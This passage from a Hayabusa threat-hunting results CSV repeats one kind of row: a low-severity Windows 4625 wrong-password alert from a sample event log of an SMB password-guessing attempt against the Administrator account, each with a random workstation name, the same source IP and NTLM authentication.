NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLXZMXKsjOaurgZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXtiRWHDJqpq69Ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeC1T9YkT1hXMcGG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPf6nlwAeuu7cf00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fvVUozD2RuIchN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP3rghcrgas3l3q1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MMtcQYoVoM57gTcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFjTWECEep09Abjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jUlguy8tKBo4DSUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GETwMERLpiVtMRkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhas9Vjc193EVcOg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmVAnxq39t7qbcEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13y2nnltjipwZqth : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDQrPBL1VodIcQLR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0Mp4jXeHd3b0CLw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3j89GmIDnG4v7JJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyRLZMoaXJUrPPfn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcoyOKUjEi1uCSpD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWQGVJLcVwgf4YJ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrFqG85mmjTYJ4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DqIh1QHTk470nrU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feVbA94p6iT2pBeC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T30YHcE8ZG7FaxW7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RaKHRwYtx2lGtOCG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDEDuMmlDZZfdkFD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CObqGJQi1hOOI83J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhsE9bQeEwW21bAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: El1qxgjvGS0QSS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vtlr3HwzJcAfSxuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDayr44iXmE63vqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkNoLVOhnS8ayujK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3ggg78jjziKqijrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BodeSVqeqa5qBQDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yY7yxEcuGwWSJZV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oTlg6cvsz6Z6QpCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3pTALzqu4Ok6CUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdGagQIEcvQQMp4n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVu4reOyQEIkChHO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EJWNS69MmMGLSnHc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPaR2sBxPPCjxpL0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kJJ9A1EfqM4V2TRv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dxf59xjpxO3oG17 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dMI12g4tjSF8PX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZAqN0xPaW4jg2Kjc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mcnReyIEaqsQfowV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: akOH8Y7XdjOpqTez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b0HOK1TIqloud7gh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n6uIAK55BmTnA6Bf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDnn6QmLOJ6KwzKt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np8KaRJvRqBrGyFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dxbu69Amr6gWN5Hw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoZdaFJWNON8Ujnc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q4RSlXgOS7sssCqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2PJprE7olK4pjrx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQOAUcWQL32y2gGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXI0wWwzhHN0uvOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujGqTzfOhmKgoAjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cFoPtWZ03O3ZZgOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyO2VTnpGZLeSIvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ua69MEWABQ9hsooT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubPQWn4nQYr3rXr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xrgATdNqkA44nKqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKwktiUfTWakNx3I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVebPFnWhbZKIANs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IyV8stIvfXLJQpsn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uStfvm0y0eZrWONH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUwTyUXe8NLG7bCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HQuDp8aZpWDANKMe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQKTlzx2gq9ayAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tCzVponBvb9mbyIr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mSwnrFv90KjN2cqj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QX5TLs2MPkia1cmk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ammLKlG1Q5awQGvN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ1ijJjPJbF4uFlo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZOLnwIzpGz03Yjh : IP Address: 192.168.198.149 : AuthPackage: 